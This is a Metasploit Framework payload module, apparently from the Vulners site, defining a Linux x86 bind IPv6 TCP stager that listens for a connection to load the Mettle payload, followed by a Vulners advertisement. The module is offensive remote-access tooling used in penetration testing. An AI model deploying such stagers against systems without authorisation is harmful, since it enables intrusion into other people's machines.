Listen for an IPv6 connection (Linux x86) using Mettle x8
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 121
include Msf::Payload::Stager
include Msf::Payload::Linux::BindTcp
def self.handler_type_alias
'bind_ipv6_tcp'
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'Bind IPv6 TCP Stager (Linux x86)',
'Description' => 'Listen for an IPv6 connection (Linux x86)',
'Author' => [ 'kris katterjohn', 'egypt' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Convention' => 'sockedi',
'Stager' => { 'RequiresMidstager' => true }
))
end
def use_ipv6
true
end
end
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo